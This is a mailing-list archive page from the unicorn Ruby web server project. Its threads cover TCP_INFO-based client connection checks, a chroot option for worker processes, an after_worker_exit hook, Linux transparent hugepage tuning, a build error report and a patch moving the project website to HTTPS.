> I guess this reasoning for using netlink is invalid for containers,
> though...

If you namespace the network it's problematic, yeah. I'm considering
right now putting Raindrops in a middleware with the netlink API
inside the container, but it feels weird. That said, if you consider
the alternative of using `getsockopt(2)` on the listening socket, I
don't know how you'd get access to the Unicorn listening socket from a
middleware. Would it be nuts to expose a hook in Unicorn that allows
periodic execution for monitoring listening stats from Raindrops on
the listening socket? It seems somewhat of a narrow use-case, but on
the other hand I'm also not a fan of doing
`Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"}")`, but
that might be less ugly.

>
>> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
>> you could also do `env.delete("hijack_io")` after hijacking to allow
>> Unicorn to still render the response. Unfortunately the
>> `<webserver>.socket` key is not part of the Rack standard, so I'm
>> hesitant to use it. When this gets into Unicorn I'm planning to
>> propose it upstream to Puma as well.
>
> I was going to say env.delete("rack.hijack_io") is dangerous
> (since env could be copied by middleware); but apparently not:
> rack.hijack won't work with a copied env, either.
> You only need to delete with the same env object you call
> rack.hijack with.
>
> But calling rack.hijack followed by env.delete may still
> have unintended side-effects in other servers; so I guess
> we (again) cannot rely on hijack working portably.

Exactly, it gives the illusion of portability but e.g. Puma stores an
instance variable to check whether a middleware hijacked, rendering
the `env#delete` option useless.

>
>> Cool. How would you suggest I check for TCP_INFO compatible platforms
>> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
>> or do you prefer another mechanism? I agree that we should fall back
>> to the write hack on other platforms.
>
> The Raindrops::TCP_Info class should be undefined on unsupported
> platforms, so I think you can check for that, instead.  Then it
> should be transparent to add FreeBSD support from unicorn's
> perspective.

Perfect. I'll start working on a patch.

>
>
> (*) So I've been wondering if adding a "unicorn-mode" to an
>     existing C10K, slow-client-capable Ruby/Rack server +
>     reverse proxy makes sense for containerized deploys.
>     Maybe...

I'd love to hear more about this idea. What are you contemplating?

^ permalink raw reply	[relevance 0%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 20:09  2%   ` Simon Eskildsen
@ 2017-02-23  1:42  2%     ` Eric Wong
  2017-02-23  2:42  0%       ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  1:42 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> Thanks for the writeup!

Another sidenote: It seems nginx <-> unicorn is a bit odd
for deployment in a containerized environment(*).

> I meant to ask, in Raindrops why do you use the netlink API to get the
> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> `tcpi_unacked`? (as described in
> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> looking to replace it with a middleware to simplify for Kubernetes.
> It's one of our main metrics for monitoring performance, especially
> around deploys.

The netlink API allows independently-spawned processes to
monitor others; so it can be system-wide.  TCP_INFO requires the
process doing the checking to also have the socket open.

I guess this reasoning for using netlink is invalid for containers,
though...

> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
> you could also do `env.delete("hijack_io")` after hijacking to allow
> Unicorn to still render the response. Unfortunately the
> `<webserver>.socket` key is not part of the Rack standard, so I'm
> hesitant to use it. When this gets into Unicorn I'm planning to
> propose it upstream to Puma as well.

I was going to say env.delete("rack.hijack_io") is dangerous
(since env could be copied by middleware); but apparently not:
rack.hijack won't work with a copied env, either.
You only need to delete with the same env object you call
rack.hijack with.

But calling rack.hijack followed by env.delete may still
have unintended side-effects in other servers; so I guess
we (again) cannot rely on hijack working portably.

> Cool. How would you suggest I check for TCP_INFO compatible platforms
> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
> or do you prefer another mechanism? I agree that we should fall back
> to the write hack on other platforms.

The Raindrops::TCP_Info class should be undefined on unsupported
platforms, so I think you can check for that, instead.  Then it
should be transparent to add FreeBSD support from unicorn's
perspective.


(*) So I've been wondering if adding a "unicorn-mode" to an
    existing C10K, slow-client-capable Ruby/Rack server +
    reverse proxy makes sense for containerized deploys.
    Maybe...

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 18:33  2% ` Eric Wong
@ 2017-02-22 20:09  2%   ` Simon Eskildsen
  2017-02-23  1:42  2%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-22 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 1:33 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> great to know it's still working after all these years :>
>
>> This confirms Eric's comment that the existing
>> `check_client_connection` works perfectly on loopback, but as soon as
>> you put an actual network between the Unicorn and client—it's only
>> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
>> to buffering, even when disabling Nagle's. As we're changing our
>> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
>> (lb) -> unicorn. That means this patch will no longer work for us.
>
> Side comment: I'm a bit curious how you guys arrived at removing
> nginx at the host level (if you're allowed to share that info)
>
> I've mainly kept nginx on the same host as unicorn, but used
> haproxy or similar (with minimal buffering) at the LB level.
> That allows better filesystem load distribution for large uploads.


Absolutely. We're starting to experiment with Kubernetes, and a result
we're interested in simplifying ingress as much as possible. We could
still run them, but if I can avoid explaining why they're there for
the next 5 years—I'll be happy :) As I see, the current use-cases we
have for the host nginx are (with why we can get rid of it):

* Keepalive between edge nginx LBs and host LBs to avoid excessive
network traffic. This is not a deal-breaker, so we'll just ignore this
problem. It's a _massive_ amount of traffic normally though.
* Out of rotation. We take nodes gracefully out of rotation by
touching a file that'll return 404 on a health-checking endpoint from
the edge LBs. Kubernetes implements this by just removing all the
containers on that node.
* Graceful deploys. When we deploy with containers, we take each
container out of rotation with the local host Nginx, wait for it to
come up, and put it back in rotation. We don't utilize Unicorns
graceful restarts because we want a Ruby upgrade deploy (replacing the
container) to be the same as an updated code rollout.
* File uploads. As you mention, currently we load-balance this between
them. I haven't finished the investigation on whether this is feasible
on the front LBs. Otherwise we may go for a 2-tier Nginx solution or
expand the edge. However, with Kubernetes I'd really like to avoid
having host nginxes. It's not very native to the Kubernetes paradigm.
Does it balance across the network, or only to the pods on that node?
* check_client_connection working. :-) This thread.

Slow clients and other advantages we find from the edge Nginxes.

>> I propose instead of the early `write(2)` hack, that we use
>> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
>> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
>> move on to the next.
>>
>> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
>>
>> This is not going to be portable, but we can do this on only Linux
>> which I suspect is where most production deployments of Unicorn that
>> would benefit from this feature run. It's not useful in development
>> (which is likely more common to not be Linux). We could also introduce
>> it under a new configuration option if desired. In my testing, this
>> works to reject 100% of requests early when not on loopback.
>
> Good to know about it's effectiveness!  I don't mind adding
> Linux-only features as long as existing functionality still
> works on the server-oriented *BSDs.
>
>> The code is essentially:
>>)?
>> def client_closed?
>>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>>   state = tcp_info.unpack("c")[0]
>>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
>> end
>
> +Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/
>
> Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
> support under Linux:
>
> https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c
>
> I haven't used it, much, but FreeBSD also implements a subset of
> this feature, nowadays, and ought to be supportable, too.  We
> can look into adding it for raindrops.

Cool, I think it makes sense to use Raindrops here, advantage being
it'd use the actual struct instead of a sketchy `#unpack`.

I meant to ask, in Raindrops why do you use the netlink API to get the
socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
`tcpi_unacked`? (as described in
http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
monitor socket backlogs with a sidekick Ruby daemon. Although we're
looking to replace it with a middleware to simplify for Kubernetes.
It's one of our main metrics for monitoring performance, especially
around deploys.

>
> I don't know about other BSDs...
>
>> This could be called at the top of `#process_client` in `http_server.rb`.
>>
>> Would there be interest in this upstream? Any comments on this
>> proposed implementation? Currently, we're using a middleware with the
>> Rack hijack API, but this seems like it belongs at the webserver
>> level.
>
> I guess hijack means you have to discard other middlewares and
> the normal rack response handling in unicorn?  If so, ouch!
>
> Unfortunately, without hijack, there's no portable way in Rack
> to get at the underlying IO object; so I guess this needs to
> be done at the server level...
>
> So yeah, I guess it belongs in the webserver.

I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
you could also do `env.delete("hijack_io")` after hijacking to allow
Unicorn to still render the response. Unfortunately the
`<webserver>.socket` key is not part of the Rack standard, so I'm
hesitant to use it. When this gets into Unicorn I'm planning to
propose it upstream to Puma as well.

>
> I think we can automatically use TCP_INFO if available for
> check_client_connection; then fall back to the old early write
> hack for Unix sockets and systems w/o TCP_INFO (which would set
> the response_start_sent flag).
>
> No need to introduce yet another configuration option.

Cool. How would you suggest I check for TCP_INFO compatible platforms
in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
or do you prefer another mechanism? I agree that we should fall back
to the write hack on other platforms.

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  @ 2017-02-22 18:33  2% ` Eric Wong
  2017-02-22 20:09  2%   ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-22 18:33 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> great to know it's still working after all these years :>

> This confirms Eric's comment that the existing
> `check_client_connection` works perfectly on loopback, but as soon as
> you put an actual network between the Unicorn and client—it's only
> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
> to buffering, even when disabling Nagle's. As we're changing our
> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
> (lb) -> unicorn. That means this patch will no longer work for us.

Side comment: I'm a bit curious how you guys arrived at removing
nginx at the host level (if you're allowed to share that info)

I've mainly kept nginx on the same host as unicorn, but used
haproxy or similar (with minimal buffering) at the LB level.
That allows better filesystem load distribution for large uploads.

> I propose instead of the early `write(2)` hack, that we use
> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
> move on to the next.
> 
> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
> 
> This is not going to be portable, but we can do this on only Linux
> which I suspect is where most production deployments of Unicorn that
> would benefit from this feature run. It's not useful in development
> (which is likely more common to not be Linux). We could also introduce
> it under a new configuration option if desired. In my testing, this
> works to reject 100% of requests early when not on loopback.

Good to know about it's effectiveness!  I don't mind adding
Linux-only features as long as existing functionality still
works on the server-oriented *BSDs.

> The code is essentially:
> 
> def client_closed?
>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>   state = tcp_info.unpack("c")[0]
>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
> end

+Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/

Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
support under Linux:

https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c

I haven't used it, much, but FreeBSD also implements a subset of
this feature, nowadays, and ought to be supportable, too.  We
can look into adding it for raindrops.

I don't know about other BSDs...

> This could be called at the top of `#process_client` in `http_server.rb`.
> 
> Would there be interest in this upstream? Any comments on this
> proposed implementation? Currently, we're using a middleware with the
> Rack hijack API, but this seems like it belongs at the webserver
> level.

I guess hijack means you have to discard other middlewares and
the normal rack response handling in unicorn?  If so, ouch!

Unfortunately, without hijack, there's no portable way in Rack
to get at the underlying IO object; so I guess this needs to
be done at the server level...

So yeah, I guess it belongs in the webserver.

I think we can automatically use TCP_INFO if available for
check_client_connection; then fall back to the old early write
hack for Unix sockets and systems w/o TCP_INFO (which would set
the response_start_sent flag).

No need to introduce yet another configuration option.

^ permalink raw reply	[relevance 2%]

* Re: Patch: Add support for chroot to Worker#user
  @ 2017-02-21 20:15  3%   ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-21 20:15 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/21 07:53, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > Any chrooting would need to happen inside Worker#user, because
> > you can't chroot until after you have parsed the list of groups,
> > and you must chroot before dropping root privileges.
> > 
> > chroot is an important security feature, so that if the unicorn
> > process is exploited, file system access is limited to the chroot
> > directory instead of the entire system.
> 
> I'm hesitant to document this as "an important security feature".
> 
> Perhaps "an extra layer of security" is more accurate,
> as there are ways of breaking out of a chroot.

That's fine.  Note that while breaking out of a chroot is easy if you
have root privileges, it is difficult to break out of a chroot
if root privileges have been dropped.  There are a couple of
possibilities listed at https://github.com/earthquake/chw00t, neither of
which is likely in environments where unicorn is typically deployed.

> 
> > This is not a complete patch as it does not include tests. I can
> > add tests if you would consider accepting this feature.
> 
> I wouldn't worry about automated tests if elevated privileges
> are required.
> 
> > -  # Changes the worker process to the specified +user+ and +group+
> > +  # Changes the worker process to the specified +user+ and +group+,
> > +  # and chroots to the current working directory if +chroot+ is set.
> >    # This is only intended to be called from within the worker
> >    # process from the +after_fork+ hook.  This should be called in
> >    # the +after_fork+ hook after any privileged functions need to be
> > @@ -123,7 +124,7 @@ def close # :nodoc:
> >    # directly back to the caller (usually the +after_fork+ hook.
> >    # These errors commonly include ArgumentError for specifying an
> >    # invalid user/group and Errno::EPERM for insufficient privileges
> > -  def user(user, group = nil)
> > +  def user(user, group = nil, chroot = false)
> >      # we do not protect the caller, checking Process.euid == 0 is
> >      # insufficient because modern systems have fine-grained
> >      # capabilities.  Let the caller handle any and all errors.
> > @@ -134,6 +135,10 @@ def user(user, group = nil)
> >        Process.initgroups(user, gid)
> >        Process::GID.change_privilege(gid)
> >      end
> > +    if chroot
> > +      Dir.chroot(Dir.pwd)
> > +      Dir.chdir('/')
> > +    end
> 
> Perhaps this can be made more flexible by allowing chroot to
> any specified directory, not just pwd.  Something like:
> 
>     chroot = Dir.pwd if chroot == true
>     if chroot
>       Dir.chroot(chroot)
>       Dir.chdir('/')
>     end
> 
> Anyways I'm inclined to accept this feature.

I had basically the same code originally, but wanted to minimize the API
surface to increase the likelihood for acceptance.  So I'm definitely in
favor of that change.

Thanks,
Jeremy


^ permalink raw reply	[relevance 3%]

* Re: Patch: Add after_worker_exit configuration option
  2017-02-21 19:43  3% ` Eric Wong
@ 2017-02-21 20:02  0%   ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-21 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/21 07:43, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > This option can be used to implement custom behavior for handling
> > worker exits.  For example, let's say you have a specific request
> > that crashes a worker process, which you expect to be due to a
> > improperly programmed C extension. By modifying your worker to
> > save request related data in a temporary file and using this option,
> > you can get a record of what request is crashing the application,
> > which will make debugging easier.
> > 
> > This is not a complete patch as it doesn't include tests, but
> > before writing tests I wanted to see if this is something you'd
> > consider including in unicorn.
> 
> What advantage does this have over Ruby's builtin at_exit?

at_exit is not called if the interpreter crashes:

ruby -e 'at_exit{File.write('a.txt', 'a')}; Process.kill :SEGV, $$' 2>/dev/null
([ -f a.txt ] && echo at_exit called) || echo at_exit not called

> 
> AFAIK, at_exit may be registered inside after_fork hooks to the
> same effect.
> 
> Thanks.

^ permalink raw reply	[relevance 0%]

* Re: Patch: Add after_worker_exit configuration option
  @ 2017-02-21 19:43  3% ` Eric Wong
  2017-02-21 20:02  0%   ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-21 19:43 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> This option can be used to implement custom behavior for handling
> worker exits.  For example, let's say you have a specific request
> that crashes a worker process, which you expect to be due to a
> improperly programmed C extension. By modifying your worker to
> save request related data in a temporary file and using this option,
> you can get a record of what request is crashing the application,
> which will make debugging easier.
> 
> This is not a complete patch as it doesn't include tests, but
> before writing tests I wanted to see if this is something you'd
> consider including in unicorn.

What advantage does this have over Ruby's builtin at_exit?

AFAIK, at_exit may be registered inside after_fork hooks to the
same effect.

Thanks.

^ permalink raw reply	[relevance 3%]

* [RFC] TUNING: document THP caveat for Linux users
@ 2016-11-29  0:00  6% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-11-29  0:00 UTC (permalink / raw)
  To: unicorn-public

This probably applies to other kernels, too, but I'm most
familiar with Linux.
---
 It took me a while to get the wording below to this point.
 Maybe there's not enough detail for folks unfamiliar with
 how OSes work, or maybe there's too much and will be TL;DR-ed...

 TUNING | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/TUNING b/TUNING
index 247090b..1f55228 100644
--- a/TUNING
+++ b/TUNING
@@ -72,10 +72,28 @@ See Unicorn::Configurator for details on the config file format.
   have them unbuffered (File#sync = true) or they are
   record(line)-buffered in userspace before any writes.
 
-== Kernel Parameters (Linux sysctl)
+== Kernel Parameters (Linux sysctl and sysfs)
 
 WARNING: Do not change system parameters unless you know what you're doing!
 
+* Transparent hugepages (THP) improves performance in many cases,
+  but can also increase memory use when relying on a
+  copy-on-write(CoW)-friendly GC (Ruby 2.0+) with "preload_app true".
+  CoW operates at the page level, so writing to a huge page would
+  trigger a 2 MB copy (x86-64), as opposed to a 4 KB copy on a
+  regular (non-huge) page.
+
+  Consider only allowing THP to be used when requested via the
+  madvise(2) syscall:
+
+	echo madvise >/sys/kernel/mm/transparent_hugepage/enabled
+
+  Or disabling it system-wide, via "never".
+
+  n.b. "page" in this context only applies to the OS kernel,
+  Ruby GC implementations also use this term for the same concept
+  in a way that is agnostic to the OS.
+
 * net.core.rmem_max and net.core.wmem_max can increase the allowed
   size of :rcvbuf and :sndbuf respectively. This is mostly only useful
   for UNIX domain sockets which do not have auto-tuning buffer sizes.
-- 
EW

^ permalink raw reply related	[relevance 6%]

* Build error of 5.1.0 due to RString
@ 2016-11-07 17:13  2% Olivier FAURAX
  0 siblings, 0 replies; 200+ results
From: Olivier FAURAX @ 2016-11-07 17:13 UTC (permalink / raw)
  To: unicorn-public

Hello,

I'm new to Ruby & Unicorn, and I get a build error trying to compile 
unicorn 5.1.0.

It is about a RString that has not some members, so perhaps an API has 
been modified somewhere.
I tried with unicorn 5.2.0, and I get the same error.

Thanks in advance
Olivier

$ uname -a
Linux git.example.com 3.16.0-76-generic #98~14.04.1-Ubuntu SMP Fri Jun 
24 17:04:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

$ ruby --version
ruby 2.1.9p490 (2016-03-30 revision 54437) [x86_64-linux]

$ gem install unicorn -v '5.1.0' -i vendor/bundle/ruby/2.1.0 --verbose
GET https://api.rubygems.org/specs.4.8.gz
200 OK
HEAD https://api.rubygems.org/api/v1/dependencies
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=unicorn
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=raindrops
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=kgio
200 OK
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0/.CHANGELOG.old
...
[long list of unicorn-5.1.0 files]
...
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0/unicorn.gemspec
Building native extensions.  This could take a while...
/opt/bitnami/ruby/bin/ruby extconf.rb
checking for SIZEOF_OFF_T in ruby.h... yes
checking for SIZEOF_SIZE_T in ruby.h... yes
checking for SIZEOF_LONG in ruby.h... yes
checking for rb_str_set_len() in ruby.h... no
checking for rb_hash_clear() in ruby.h... no
checking for gmtime_r() in time.h... yes
creating Makefile
make "DESTDIR=" clean
make "DESTDIR="
compiling httpdate.c
compiling unicorn_http.c
In file included from unicorn_http.rl:8:0:
ext_help.h: In function ‘rb_18_str_set_len’:
ext_help.h:18:15: error: ‘struct RString’ has no member named ‘len’
    RSTRING(str)->len = len;
                ^
ext_help.h:19:15: error: ‘struct RString’ has no member named ‘ptr’
    RSTRING(str)->ptr[len] = '\0';
                ^
make: *** [unicorn_http.o] Error 1
ERROR:  Error installing unicorn:
         ERROR: Failed to build gem native extension.

     Building has failed. See above output for more information on the 
failure.
make failed, exit code 2

Gem files will remain installed in 
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0 
for inspection.
Results logged to 
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/extensions/x86_64-linux/2.1.0-static/unicorn-5.1.0/gem_make.out

^ permalink raw reply	[relevance 2%]

* Re: Master wait time metric
  2016-10-31 23:36  3% ` Eric Wong
@ 2016-11-01  8:21  0%   ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2016-11-01  8:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Brilliant, this will make it super easy to write a Prometheus
exporter, will post here once I am done.

On Tue, Nov 1, 2016 at 10:36 AM, Eric Wong <e@80x24.org> wrote:
> Sam Saffron <sam.saffron@gmail.com> wrote:
>> Hi Eric / everyone :)
>>
>> I would like to start graphing how long our master process spends
>> waiting for worker processes to be available.
>
> Fwiw, the master doesn't wait for workers to become available for
> processing requests.  But I think I know what you mean to ask :>
>
> Rather, the connection request sits in the listen queue (a kernel
> object) shared by all workers, and instrumenting this is always
> kernel-dependent (because unicorn avoids doing stuff in userspace).
>
>> This metric will allow us to quickly tell if a unicorn is being
>> overloaded and allow us to quickly remediate.
>>
>> Once a minute I want to ask the master process how long it spent
>> waiting for child processes to become available.
>>
>> How would I go about getting that metric?
>
> Linux-only, but you can probably look at Raindrops::LastDataRecv
>
>         https://bogomips.org/raindrops/Raindrops/LastDataRecv.html
>
> Raindrops::Middleware can give you how big the listen queue is,
> too.  Ideally, this should never exceed 1.
>
>         https://bogomips.org/raindrops/Raindrops/Middleware.html
>
>
> You can probably get the same metrics directly from the kernel
> via systemtap, dtrace, or similar, too.

^ permalink raw reply	[relevance 0%]

* Re: Master wait time metric
  @ 2016-10-31 23:36  3% ` Eric Wong
  2016-11-01  8:21  0%   ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2016-10-31 23:36 UTC (permalink / raw)
  To: Sam Saffron; +Cc: unicorn-public

Sam Saffron <sam.saffron@gmail.com> wrote:
> Hi Eric / everyone :)
> 
> I would like to start graphing how long our master process spends
> waiting for worker processes to be available.

Fwiw, the master doesn't wait for workers to become available for
processing requests.  But I think I know what you mean to ask :>

Rather, the connection request sits in the listen queue (a kernel
object) shared by all workers, and instrumenting this is always
kernel-dependent (because unicorn avoids doing stuff in userspace).

> This metric will allow us to quickly tell if a unicorn is being
> overloaded and allow us to quickly remediate.
> 
> Once a minute I want to ask the master process how long it spent
> waiting for child processes to become available.
> 
> How would I go about getting that metric?

Linux-only, but you can probably look at Raindrops::LastDataRecv

	https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Raindrops::Middleware can give you how big the listen queue is,
too.  Ideally, this should never exceed 1.

	https://bogomips.org/raindrops/Raindrops/Middleware.html


You can probably get the same metrics directly from the kernel
via systemtap, dtrace, or similar, too.

^ permalink raw reply	[relevance 3%]

* [PATCH] relocate website to https://bogomips.org/unicorn/
@ 2016-10-25 22:25  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-10-25 22:25 UTC (permalink / raw)
  To: unicorn-public

HTTPS helps some with reader privacy and Let's Encrypt seems to
be working well enough the past few months.

This change will allow us to reduce subjectAltName bloat in our
TLS certificate over time.  It will also promote domain name
agility to support mirrors or migrations to other domains
(including a Tor hidden service mirror).

http://bogomips.org/unicorn/ will remain available for people on
legacy systems without usable TLS.  There is no plan for automatic
redirecting from HTTP to HTTPS at this time.
---

 I'm not sure when I'll remove "unicorn.bogomips.org"
 subjectAltName from the TLS certificate, yet, hopefully
 within a year; but maybe that's optimistic

 I never actually advertised the HTTPS site for this project
 before today, but search engines picked it up.  Oh well :<

 .olddoc.yml                       |  6 +++---
 Documentation/unicorn.1.txt       |  4 ++--
 Documentation/unicorn_rails.1.txt |  4 ++--
 GNUmakefile                       |  4 ++--
 HACKING                           |  2 +-
 ISSUES                            | 12 ++++++------
 Links                             |  4 ++--
 README                            |  4 ++--
 SIGNALS                           |  2 +-
 examples/big_app_gc.rb            |  2 +-
 examples/nginx.conf               |  2 +-
 examples/unicorn.conf.minimal.rb  |  4 ++--
 examples/unicorn.conf.rb          |  4 ++--
 lib/unicorn/configurator.rb       |  6 +++---
 lib/unicorn/http_server.rb        |  2 +-
 15 files changed, 31 insertions(+), 31 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index c4a9236..ee2d306 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,8 +1,8 @@
 ---
-cgit_url: http://bogomips.org/unicorn.git
+cgit_url: https://bogomips.org/unicorn.git
 git_url: git://bogomips.org/unicorn.git
-rdoc_url: http://unicorn.bogomips.org/
-ml_url: http://bogomips.org/unicorn-public/
+rdoc_url: https://bogomips.org/unicorn/
+ml_url: https://bogomips.org/unicorn-public/
 merge_html:
   unicorn_1: Documentation/unicorn.1.html
   unicorn_rails_1: Documentation/unicorn_rails.1.html
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index 3f20a9a..e692078 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -181,7 +181,7 @@ the unicorn config file.
 * [Rack RDoc][2]
 * [Rackup HowTo][3]
 
-[1]: http://unicorn.bogomips.org/
+[1]: https://bogomips.org/unicorn/
 [2]: http://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
-[4]: http://unicorn.bogomips.org/SIGNALS.html
+[4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index 2ce7501..088e2ff 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -169,7 +169,7 @@ used by Unicorn.
 * [Rack RDoc][2]
 * [Rackup HowTo][3]
 
-[1]: http://unicorn.bogomips.org/
+[1]: https://bogomips.org/unicorn/
 [2]: http://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
-[4]: http://unicorn.bogomips.org/SIGNALS.html
+[4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/GNUmakefile b/GNUmakefile
index 3f9c441..bc9c643 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -183,13 +183,13 @@ doc: .document $(ext)/unicorn_http.c man html .olddoc.yml $(PLACEHOLDERS)
 	install -m644 $(man1_paths) doc/
 	tar cf - $$(git ls-files examples/) | (cd doc && tar xf -)
 
-# publishes docs to http://unicorn.bogomips.org
+# publishes docs to https://bogomips.org/unicorn/
 publish_doc:
 	-git set-file-times
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ unicorn.bogomips.org:/srv/unicorn/
+	$(RSYNC) -av doc/ bogomips.org:/srv/bogomips/unicorn/
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx
diff --git a/HACKING b/HACKING
index 0fa22cd..d55f1c7 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-<tt>http://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
+<tt>https://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/ISSUES b/ISSUES
index 21bd013..291441a 100644
--- a/ISSUES
+++ b/ISSUES
@@ -2,8 +2,8 @@
 
 mailto:unicorn-public@bogomips.org is the best place to report bugs,
 submit patches and/or obtain support after you have searched the
-{email archives}[http://bogomips.org/unicorn-public/] and
-{documentation}[http://unicorn.bogomips.org/].
+{email archives}[https://bogomips.org/unicorn-public/] and
+{documentation}[https://bogomips.org/unicorn/].
 
 * No subscription will ever be required to email us
 * Cc: all participants in a thread or commit, as subscription is optional
@@ -12,7 +12,7 @@ submit patches and/or obtain support after you have searched the
 * Do not send HTML mail or images, it will be flagged as spam
 * Anonymous and pseudonymous messages will always be welcome.
 * The email submission port (587) is enabled on the bogomips.org MX:
-  http://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
+  https://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
 
 If your issue is of a sensitive nature or you're just shy in public,
 then feel free to email us privately at mailto:unicorn@bogomips.org
@@ -67,7 +67,7 @@ document distributed with git) on guidelines for patch submission.
 * private: mailto:unicorn@bogomips.org
 * nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
 * nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-* http://bogomips.org/unicorn-public/
+* https://bogomips.org/unicorn-public/
 
 Mailing list subscription is optional, so Cc: all participants.
 
